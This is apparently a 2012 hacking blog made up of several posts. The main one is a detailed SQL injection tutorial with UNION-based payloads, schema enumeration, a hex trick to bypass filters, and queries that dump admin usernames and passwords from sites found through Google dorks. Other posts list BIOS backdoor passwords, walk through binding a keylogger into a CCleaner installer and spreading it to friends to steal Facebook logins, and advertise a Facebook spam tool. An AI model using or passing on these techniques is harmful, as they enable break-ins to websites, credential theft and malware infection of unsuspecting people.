This is default featured post 1 title

Don't get hooked by phishers.

This is default featured post 2 title

Because we care, we're security aware.

This is default featured post 3 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara -

This is default featured post 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara -

This is default featured post 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara -

Saturday, October 20, 2012


SQL Injection Full and Detail Guide and Tutorial - 2012

Here you will find a very detailed, step by step tutorial originally written by  (PhortyPhour) on SQL injection. This is purely for educational purposes and is to be used at the discretion of the reader.

First we have to know what SQL injection is exactly.

SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks.

That is the first paragraph of the wikipedia page for SQLi (SQL injection) found here:

I would advise reading the entire page.

What is covered in this tutorial?

Part One - Website Assessment
Section One - Finding a vulnerable website
Section Two - Determining the amount of columns
Section Three - Finding which columns are vulnerable

Part Two - Gathering Information
Section One - Determining the SQL version
Section Two - Finding the database

Part Three - The Good Stuff
Section One - Finding the table names
Section Two - Finding the column names
Section Three - Displaying the column contents
Section Four - Finding the admin page

Now let's begin.

Part One - Website Assessment

In order for us to start exploiting a website we must first know exactly what we are injecting into. This is what we will be covering in Part One along with how to assess the information that we gather.

Section One - Finding a vulnerable website

Vulnerable websites can be found using dorks (I will include a list at the end of this tutorial), either in Google or with an exploit scanner. For those of you that are unfamiliar with the term "dorks", I will try to explain.

Dorks are website URLs that are known to be vulnerable. In SQL injection these dorks look like this:


This will be inputted into a search engine and because of the "inurl:" part of the dork, the search engine will return results with URLs that contain the same characters. Some of the sites that have this dork on their website may be vulnerable to SQL injection.

Now let's say we found the page:


In order to test this site all we need to do is add a ' either in between the "=" sign and the "1" or after the "1" so it looks like this:


After pressing enter, if this website returns an error such as the following:

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home1/michafj0/public_html/gallery.php on line 7

Or something along those lines, this means it's vulnerable to injection.

In the case where you are to find a website such as this:


Then you must use the same technique with adding a ' except it must be between the value (in this case the number) and the operator (the "=" sign) so it looks like this:


There are programs that will do this for you but to start off I would suggest simply to do things manually, using Google, and so I won't post any for you guys. If you feel so compelled to use one anyways. I recommend the Exploit Scanner by Reiluke.

Section Two - Determining the amount of columns

In order for us to be able to use commands and get results we must know how many columns there are on a website. So to find the number of columns we must use a very complex and advanced method that I like to call "Trial and Error" with the ORDER BY command Biggrin

NOTE: SQL does not care whether or not your letters are capitalized or not and I'm just doing it out of clarity, for all it cares your queries could look like this:

Code: CaN I HaZ TeH PaSSwOrDs? PLz aNd ThX

IT DOESN'T MATTER (btw please don't think that was an actual command).

So back to the ORDER BY command. To find the number of columns we write a query with incrementing values until we get an error, like this:

Code: ORDER BY 1-- <---No error ORDER BY 2-- <---No error ORDER BY 3-- <---No error ORDER BY 4-- <---No error ORDER BY 5-- <---ERROR!

This means that there are four columns!


Section Three - Finding which columns are vulnerable

So we know that there are four columns now we have to find out which ones are vulnerable to injection. To do this we use the UNION and SELECT queries while keeping the double null (--) at the end of the string. There is also one other difference that is small in size but not in importance, see if you can spot it.

Code: UNION SELECT 1,2,3,4--

If you couldn't spot the difference, it's the extra null in between the "=" sign and the value (the number).


Now after entering that query you should be able to see some numbers somewhere on the page that seem out of place. Those are the numbers of the columns that are vulnerable to injection. We can use those columns to pull information from the database which we will see in Part Two.

Part Two - Gathering Information

In this part we will discover how to find the name of the database and what version of SQL the website is using by using queries to exploit the site.

Section One - Determining the SQL version.

Finding the version of the SQL of the website is a very important step because the steps you take for version 4 are quite different from version 5 in order to get what you want. In this tutorial, I will not be covering version 4 because it really is a guessing game and for the kind of sites that are still using it, it's not worth your time.

If we look back to the end of Section Three in Part One we saw how to find the vulnerable columns. Using that information we can put together our next query (I will be using column 2). The command should look like this:

Code: UNION SELECT 1,@@version,3,4--

Because 2 is the vulnerable column, this is where we will place "@@version". Another string that could replace "@@version" is "version()".

If the website still does not display the version try using unhex(hex()) which looks like this:

Code: UNION SELECT 1,unhex(hex(@@version)),3,4--

NOTE: If this method must be used here, it must be used for the rest of the injection as well.

Now what you want to see is something along these lines:


Which is the version of the SQL for the website.

NOTE: If you see version 4 and you would like to have a go at it, there are other tutorials that explain how to inject into it.

Section Two - Finding the database

Finding the name of the database is not always a necessary step to take to gather the information that you want, however in my experience folllowing these steps and finding the database may sometimes lead to a higher success rate.

To find the database we use a query like the one below:

Code: UNION SELECT 1,group_concat(schema_name),3,4 from information_schema.schemata--

This could sometimes return more results than necessary and so that is when we switch over to this query instead:

Code: UNION SELECT 1,concat(database()),3,4--

Congrats! You now have the name of the database! Copy and paste the name somewhere safe, we'll need it for later.

Part Three - The Good Stuff

This is the fun part where we will find the usernames, emails and passwords!

Section One - Finding the table names

To find the table names we use a query that is similar to the one used for finding the database with a little bit extra added on:

Code: UNION SELECT 1,group_concat(table_name),3,4 FROM information_schema.tables WHERE table_schema=database()--

It may look long and confusing but once you understand it, it really isn't so I'll try to explain. What this query does is it "groups" (group_concat) the "table names" (table_name) together and gathers that information "from" (FROM) information_schema.tables where the "table schema" (table_schema) can be found in the "database" (database()).

NOTE: While using group_concat you will only be able to see 1024 characters worth of tables so if you notice that a table is cut off on the end switch over to limit which I will explain now.

Code: UNION SELECT 1,table_name,3,4 FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1--

What this does is it shows the first and only the first table. So if we were to run out of characters on let's say the 31st table we could use this query:

Code: UNION SELECT 1,table_name,3,4 FROM information_schema.tables WHERE table_schema=database() LIMIT 30,1--

Notice how my limit was 30,1 instead of 31,1? This is because when using limit is starts from 0,1 which means that the 30th is actually the 31st Tongue

You now have all the table names!

Section Two - Finding the column names

Now that you have all of the table names try and pick out the one that you think would contain the juicy information. Usually they're tables like User(s), Admin(s), tblUser(s) and so on but it varies between sites.

After deciding which table you think contains the information, use this query (in my example, I'll be using the table name "Admin"):

Code: UNION SELECT 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name="Admin"--

This will either give you a list of all the columns within the table or give you an error but don't panic if it is outcome #2! All this means is that Magic Quotes is turned on. This can be bypassed by using a hex or char converter (they both work) to convert the normal text into char or hex (a link to a website that does this will be included at the end of the tutorial).

UPDATE: If you get an error at this point all you must do is follow these steps:

1. Copy the name of the table that you are trying to access.
2. Paste the name of the table into this website where it says "Say Hello To My Little Friend".
Hex/Char Converter
3. Click convert.
4. Copy the string of numbers/letters under Hex into your query so it looks like this:

Code: UNION SELECT 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name=0x41646d696e--

Notice how before I pasted the hex I added a "0x", all this does is tells the server that the following characters are part of a hex string.

You should now see a list of all the columns within the table such as username, password, and email.

NOTE: Using the limit function does work with columns as well.

Section Three - Displaying the column contents

We're almost done! All we have left to do is to see what's inside those columns and use the information to login! To view the columns we need to decide which ones we want to see and then use this query (in this example I want to view the columns "username", "password", and "email", and my database name will be "db123"). This is where the database name comes in handy:

Code: UNION SELECT 1,group_concat(username,0x3a,password,0x3a,email),3,4 FROM db123.Admin--

In this query, 0x3a is the hex value of a colon (:) which will group the username:password:email for the individual users just like that.

FINALLY! Now you have the login information for the users of the site, including the admin. All you have to do now is find the admin login page which brings us to Section Four.

Section Four - Finding the admin page

Usually the admin page will be directly off of the site's home page, here are some examples:


Once again there are programs that will find the page for you but first try some of the basic guesses, it might save you a couple of clicks. If you do use a program Reiluke has coded one for that as well. Search Admin Finder by Reiluke.

And that conlcudes my tutorial! I hope it was helpful to some of you. Remember to keep practicing and eventually you'll have all of the queries memorized in no time!

Comment and Rate!

Also I would like put a commonly used dork list.

Dork List


Monday, October 8, 2012

Bios passwd


Here the list of some BIOS backdoor password for many main board manufacture:

Award BIOS backdoor passwords:

pint------------589589-------- aPAf
J256------------syxz-----------AWARD SW
J262------------shift + syxz---AWARD PW
j332------------TTPTHA-------- AWKWARD

AMI BIOS Backdoor Passwords:

Phoenix BIOS Backdoor Passwords:

Misc. Common Passwords

Other BIOS Passwords by Manufacturer
VOBIS & IBM---- merlin
Biostar-------- Biostar
Packard Bell----bell9
HP Vectra------hewlpack

Pen drive threat

Pen Drives main threat to Cyber Security: Army


New Delhi, Sep 30: Despite a ban, use of pen drives has emerged as the main threat to cyber security in defence forces as it is responsible for over 70 per cent of such breaches in the three Services.
The use of pen drives as an easy-to-carry storage device has increased in the recent past and internal reports have confirmed that over 70 per cent cyber security breaches in the armed forces are due to their unauthorised use, Army officials told PTI here.
"These pen drives, which are mostly manufactured in China, have emerged as a big threat to our cyber security systems," they said.
Fresh cyber security guidelines have been issued by the Army headquarters to protect sensitive military networks from hacker attacks, sources said.
Measures have been taken by the other two services also to tighten their cyber security as IAF also recently issued instructions to its personnel warning them against having any official data on their personal computers and pen drives.
All personnel have been asked to declare their Information Technology assets and have been asked not to have any official data on them, IAF officials said here.
Anybody found violating these instructions in checks by cyber security personnel will draw strict action which may even amount to disciplinary action including court martial, they said.
When asked about the development, IAF spokesperson Wg Cdr Gerard Galway confirmed the steps taken by the Air headquarters to safeguard its cyber assets and secret information.
Sources said generally it is found that officials use pen drive to store official data for use at their personal computers but from there, it is transmitted from their IP addresses to hackers from the 'malware' present in the pen drives.
About a couple of years ago, a Major posted in Andaman and Nicobar Islands was apprehended as it was found that sensitive data was being transferred from his computer.
However, it later emerged that his system had been hacked and spying viruses were transferring information to other computers.
An IAF Junior Warrant officer was also apprehended by officials after he was found in possession of unauthorised CDs carrying official information.
The Navy's Eastern Command was also affected after hacker groups were found to be stealing information from its computers there due to malware put in them by external drives.
As part of efforts to counter cyber attacks, the National Security Council has also been discussing designating certain intelligence agencies under the Defence Ministry for countering cyber offensives against the country.

Friday, September 28, 2012


Check if Ur Ports are Hacked or NOT
A website tells u if your computer ports are hacked or not

This server will now attempt to open several common ports on your computer. The results of these attempts will be displayed on this page as Open, Closed, or Secure:

If your firewall is configured to block a port, and it is operating correctly, you will see Secure and an event will be logged on your firewall.
A Closed port indicates that the port is reachable but there is no program currently accepting connections there.
If the port is indicated as Open there is an application or service on your computer actively accepting connections.

The time to check each port will range from less than a second up to 20 seconds. Ports which are Secure will take the most time and if u are secured after the test ends tells u

Test complete.
No open ports were found
click below link

Thursday, September 13, 2012

Huck fb passwd

Hack facebook password remotely
Hacking Facebook account is very easy and just requires not more than 10 minutes of work. Don't worry i will also tell you how to protect your facebook account or passwords from such hacks and hackers. But for this you must know how hackers hack your facebook account. So first i teach you how to hack facebook account remotely and then i will tell how to protect yourself from this.

So guys lets start hacking Facebook account or passwords....

Steps to hack Facebook account using Keylogger:
1. Creating the Keylogger Server to hack Facebook passwords.
2. Extracting the Icon from installer.
3. Bind the keylogger server with any software setup.
4. How to spread your keylogger or send it to your friends to hack their Facebook accounts or passwords.

Step 1. Creating the Keylogger Server
1. Download the keylogger.

2. Extract the file, Now you will get two folders:
a. First one contains Keylogger and Binder
b. Second Contains resource hacker tool.( to extract the icons from installers).

3. Now open the Keylogger. It contains two files one for gmail email and other for password. For this create one test account on Gmail and enter it's details in this.

4. After entering email and password. Set the time interval usually set 3 mins i.e. after how much time you want to receive logs from the user.
5. Now click on send verification mail. This mail is to test that your keylogger is working correctly or not.
6. After you click this you will receive a confirmation mail on test account which will confirm that keylogger is working.
7. Now click on generate to set the mutex (any secret key to make your keylogger FUD) and then click on compile server.
8. Now save the file to desktop or any other location of your choice. Now your server is ready but it can be easily detected.

Step 2.: Extracting the Icon file from any installer(resource hacker)
1. Open the Resource hacker folder and open the reshacker file.
2. Now go to its menu and open any setup file. Suppose we want to attach our keylogger toCcleaner setup file. So open the Ccleaner setup with resource hacker.
3. Now in menu there is one action button click on it and then click save all resources.
4. Now save all the resources to desktop or any other location of your choice.
5. It consists of two files one is icon file and other is res file . We only need icon file, so you can delete the other file i.e res file.
6. Now we have Icon of installer file(as discussed above Ccleaner setup Icon).

Step 3: Bind the Keylogger server with any software
1. Now Go to keylogger folder and open the Binder.
2. Now Click on + button given below to add files.
3. Now add the keylogger server and the set up of software (i.e. in our case it's Ccleaner setup).
4. Now in menu of Binder, Go to Settings. There select the icon that we have generated in the previous step and set the location of output file as shown in figure.
5. Now again go to File's menu in Binder and click on Bind files.
6. Now your Binded keylogger is ready. Now you have to spread it or send it to the slave that is your friend.

Step4 : How to Spread Keylogger or send it to slave or friend
1. Now you have one Software setup file with keylogger attached with it.(In our case we have Ccleaner setup with keylogger attached with it.
2. Now Spread your keylogger through forums. You might be a member of various forums use them to spread your keylogger in form of software posts. You can use various software's to spread them that users frequently download.
3. Spread it through pendrives or USB hard drives. Suppose a friend asked you for a software give it the software that has keylogger attached with it.
Note: you can also attach keylogger with images also. But that can be detectable by antivirus. So avoid such type of hacking.
So isn't that so easy to hack anyone's Facebook account in just few minutes.

How to protect yourself from these hacks?
Prevention is always better than cure so always follow these steps:
1. Don't use cracked softwares and don't download them from unauthorized websites.
2. Always keep your antivirus and anti-spyware up to date.
3. Always scan the files before transferring them to your USB.
4. Do not allow other users to use your PC i.e password protect it.

fb frnd bomber

Facebook Friend Bomber 2.0.1
1. Mass Facebook Amber Alerts (New)
2. Mass Facebook Friend Requests
3. Mass Facebook Friend Messages
4. Mass Facebook Friend Pokes
5. Mass Facebook Wall Poster
6. 100% CAPTCHA Bypass*
7. Single & Unlimited Licenses
Download: Facebook Friend Bomber 2.0.1


Twitter Delicious Facebook Digg Stumbleupon Favorites